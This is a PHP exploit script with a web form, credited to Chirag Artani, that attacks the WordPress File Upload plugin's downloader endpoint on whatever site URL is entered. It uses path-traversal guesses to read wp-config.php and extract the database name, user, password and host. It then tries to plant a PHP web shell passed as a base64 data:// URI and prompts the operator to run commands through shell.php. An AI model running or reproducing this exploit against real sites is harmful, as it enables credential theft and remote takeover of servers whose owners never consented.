<?php
// exploit.php - by chirag artani, use xampp to run code
// Declare the response as HTML up front; this must run before any byte of output is sent.
header('Content-Type: text/html; charset=utf-8');
/**
 * Probe of the WordPress File Upload plugin's wfu_file_downloader.php endpoint.
 *
 * The class builds a JSON download descriptor, writes it to a temporary file on
 * the machine running this script, and POSTs that file's basename to the plugin
 * endpoint as the `source` field. Success is judged only from the HTTP status and
 * plain string matching on the response body (see exploit()).
 *
 * Side effects: one HTTP(S) POST per candidate install root, with TLS
 * certificate and hostname verification disabled. Nothing is echoed; log lines
 * accumulate in $output and are read back with getOutput().
 */
class WFUExploit {
    // Absolute URL of the plugin downloader script, derived from $wordpress_url.
    private $plugin_url;
    // Target site root with trailing slashes removed.
    private $wordpress_url;
    // Newline-terminated log entries appended by log().
    private $output = '';

    /**
     * @param string $wordpress_url Site root, e.g. "https://example.com/wordpress";
     *                              trailing '/' characters are stripped.
     */
    public function __construct($wordpress_url) {
        $this->wordpress_url = rtrim($wordpress_url, '/');
        $this->plugin_url = $this->wordpress_url . '/wp-content/plugins/wp-file-upload/wfu_file_downloader.php';
    }

    /** Append one line to the in-memory log; nothing is written to stdout. */
    private function log($message) {
        $this->output .= $message . "\n";
    }

    /** @return string All log lines recorded so far, newline-separated. */
    public function getOutput() {
        return $this->output;
    }

    /**
     * Build the JSON descriptor that is sent (by reference to a temp file) to the endpoint.
     *
     * `ticket` is a fixed placeholder and `expire` is one hour from now.
     * `wfu_ABSPATH` carries the candidate install root supplied by the caller;
     * presumably the endpoint resolves `filepath` against it — confirm against
     * the plugin source. Slashes are left unescaped so paths stay readable.
     *
     * @param string $target_file Path or stream URI to request.
     * @param string $abspath     Candidate WordPress ABSPATH value.
     * @return string JSON text.
     */
    private function createPayload($target_file, $abspath) {
        return json_encode([
            'type' => 'normal',
            'ticket' => 'ABC123',
            'filepath' => $target_file,
            'handler' => '',
            'expire' => time() + 3600,
            'wfu_ABSPATH' => $abspath,
            'wfu_browser_downloadfile_notexist' => 'File not found',
            'wfu_browser_downloadfile_failed' => 'Download failed'
        ], JSON_UNESCAPED_SLASHES);
    }

    /**
     * Strip the HTTP header block from a raw curl response (CURLOPT_HEADER is on).
     *
     * Splits at the first CRLFCRLF and returns what follows; if no blank line is
     * present the input is returned unchanged. Only a single header block is
     * handled.
     *
     * @param string $response Raw response including headers.
     * @return string Body text.
     */
    private function extractContent($response) {
        if (strpos($response, "\r\n\r\n") !== false) {
            list($headers, $body) = explode("\r\n\r\n", $response, 2);
            return $body;
        }
        return $response;
    }

    /**
     * Pull the database constants and table prefix out of wp-config.php source text.
     *
     * Only the single-quoted `define('KEY', 'value')` form and a single-quoted
     * `$table_prefix = '...'` assignment are recognised; any key that does not
     * match yields the literal string 'Not found'.
     *
     * @param string $content Raw wp-config.php text.
     * @return array<string, string> Keys DB_NAME, DB_USER, DB_PASSWORD, DB_HOST, TABLE_PREFIX.
     */
    private function parseWPConfig($content) {
        $config = [];
        $patterns = [
            'DB_NAME' => "/define\(\s*'DB_NAME',\s*'([^']+)'\s*\)/",
            'DB_USER' => "/define\(\s*'DB_USER',\s*'([^']+)'\s*\)/",
            'DB_PASSWORD' => "/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\)/",
            'DB_HOST' => "/define\(\s*'DB_HOST',\s*'([^']+)'\s*\)/",
            'TABLE_PREFIX' => "/\\\$table_prefix\s*=\s*'([^']+)'/"
        ];
        foreach ($patterns as $key => $pattern) {
            // preg_match() overwrites $matches on every call (empty array on no
            // match), so a stale capture from the previous key cannot leak through.
            preg_match($pattern, $content, $matches);
            $config[$key] = isset($matches[1]) ? $matches[1] : 'Not found';
        }
        return $config;
    }

    /**
     * Request $target_file through the downloader endpoint, once per candidate install root.
     *
     * For each candidate the method writes the JSON payload to a temp file under
     * sys_get_temp_dir() on the host running this script, POSTs only that file's
     * basename as `source`, and inspects the response. It returns at the first
     * candidate judged successful.
     *
     * Success criteria (string matching only):
     *  - target name contains "wp-config.php" and the body contains "DB_NAME":
     *    the parsed DB settings are logged and true is returned;
     *  - target starts with "php://" or "data://" and the raw response does not
     *    contain 'Failed to open stream': true is returned. Nothing in this class
     *    creates the shell.php mentioned in that log line; it is only a hint to
     *    the operator.
     *
     * @param string $target_file File path or stream URI to request.
     * @return bool true on the first match, false if every candidate fails.
     */
    public function exploit($target_file) {
        $this->log("[*] Target: {$this->wordpress_url}");
        $this->log("[*] Attempting to read: $target_file");
        // Candidate install roots: common XAMPP and Debian layouts first, then
        // relative traversal strings whose meaning depends on where the endpoint
        // resolves them.
        $wordpress_paths = [
            'C:/xampp/htdocs/wordpress/',
            'C:/xampp/htdocs/',
            '/var/www/html/wordpress/',
            '/var/www/html/',
            '../../../../',
            '../../../',
            '../../',
            '../',
            './'
        ];
        foreach ($wordpress_paths as $wp_path) {
            $this->log("[*] Testing path: $wp_path");
            // The payload file is created LOCALLY (this script's host), never
            // uploaded; only its basename (prefix 'wfu_') travels in the request
            // as the `source` POST field.
            $temp_dir = sys_get_temp_dir();
            $json_file = tempnam($temp_dir, 'wfu_');
            $payload = $this->createPayload($target_file, $wp_path);
            file_put_contents($json_file, $payload);
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $this->plugin_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => ['source' => basename($json_file)],
                CURLOPT_RETURNTRANSFER => true,
                // Headers are kept in $response so extractContent() can strip them.
                CURLOPT_HEADER => true,
                CURLOPT_FOLLOWLOCATION => true,
                // TLS certificate and hostname checks are off: the request trusts
                // whatever answers at $plugin_url, including an interposed host.
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_TIMEOUT => 10
            ]);
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            // Best-effort cleanup; warnings are suppressed and the file is removed
            // regardless of the request outcome.
            @unlink($json_file);
            // curl_exec() returns false on a transport error, which empty() also rejects.
            if ($http_code == 200 && !empty($response)) {
                $content = $this->extractContent($response);
                if (strpos($target_file, "wp-config.php") !== false && strpos($content, "DB_NAME") !== false) {
                    $this->log("\n[+] WordPress Configuration Found!");
                    $config = $this->parseWPConfig($content);
                    foreach ($config as $key => $value) {
                        $this->log(sprintf("%-15s: %s", $key, $value));
                    }
                    return true;
                }
                elseif (strpos($target_file, "php://") === 0 || strpos($target_file, "data://") === 0) {
                    // Unlike the branch above this scans the raw response, headers
                    // included, and treats the mere absence of an error string as success.
                    if (strpos($response, 'Failed to open stream') === false) {
                        $this->log("\n[+] RCE Upload Successful!");
                        $this->log("[*] Try accessing: {$this->wordpress_url}/shell.php?cmd=whoami");
                        return true;
                    }
                }
            }
        }
        return false;
    }
}
// HTML Interface
// Form handler. It carries no authentication, CSRF token or origin check: anyone
// who can reach this page can make the hosting server issue the requests above
// against an arbitrary URL, so it must not be left on an exposed host.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['wordpress_url'])) {
    // FILTER_SANITIZE_URL only strips characters that are illegal in a URL;
    // the VALIDATE step below is what rejects malformed input. Neither filter
    // restricts the scheme or the destination host.
    $wordpress_url = filter_var($_POST['wordpress_url'], FILTER_SANITIZE_URL);
    if (!filter_var($wordpress_url, FILTER_VALIDATE_URL)) {
        // Rendered HTML-escaped by the template below.
        $error = "Invalid URL format";
    } else {
        $exploit = new WFUExploit($wordpress_url);
        // The buffer swallows anything the probe might echo directly; the log
        // itself is collected via getOutput(), not from this buffer.
        ob_start();
        // Try reading wp-config.php
        $exploit->exploit("wp-config.php");
        // Try RCE
        // Web-shell source, base64-encoded into a data:// URI and passed as the
        // requested filepath; exploit() routes data:// targets to its RCE branch.
        $php_shell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } else { echo "Shell ready"; } ?>';
        $encoded_shell = base64_encode($php_shell);
        $exploit->exploit("data://text/plain;base64," . $encoded_shell);
        // Both runs append to the same log; $result holds the combined text.
        $result = $exploit->getOutput();
        ob_end_clean();
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WFU Security Testing Tool</title>
<style>
body {
font-family: monospace;
max-width: 900px;
margin: 20px auto;
padding: 20px;
background: #f5f5f5;
}
.container {
background: white;
padding: 20px;
border-radius: 5px;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #eee;
padding-bottom: 10px;
}
.form-group {
margin-bottom: 15px;
}
input[type="text"] {
width: 100%;
padding: 8px;
font-family: monospace;
}
input[type="submit"] {
background: #4CAF50;
color: white;
padding: 10px 20px;
border: none;
border-radius: 3px;
cursor: pointer;
}
.output {
background: #333;
color: #fff;
padding: 15px;
border-radius: 3px;
white-space: pre-wrap;
margin-top: 20px;
}
.error {
color: red;
margin-bottom: 10px;
}
</style>
</head>
<body>
<div class="container">
<h1>WordPress File Upload Security Testing Tool</h1>
<form method="POST" action="">
<div class="form-group">
<label for="wordpress_url">WordPress URL:</label><br>
<input type="text" id="wordpress_url" name="wordpress_url"
placeholder="https://example.com/wordpress"
required>
</div>
<?php if (isset($error)): ?>
<div class="error"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<input type="submit" value="Test URL">
</form>
<?php if (isset($result)): ?>
<div class="output"><?php echo htmlspecialchars($result); ?></div>
<?php endif; ?>
</div>
</body>
</html>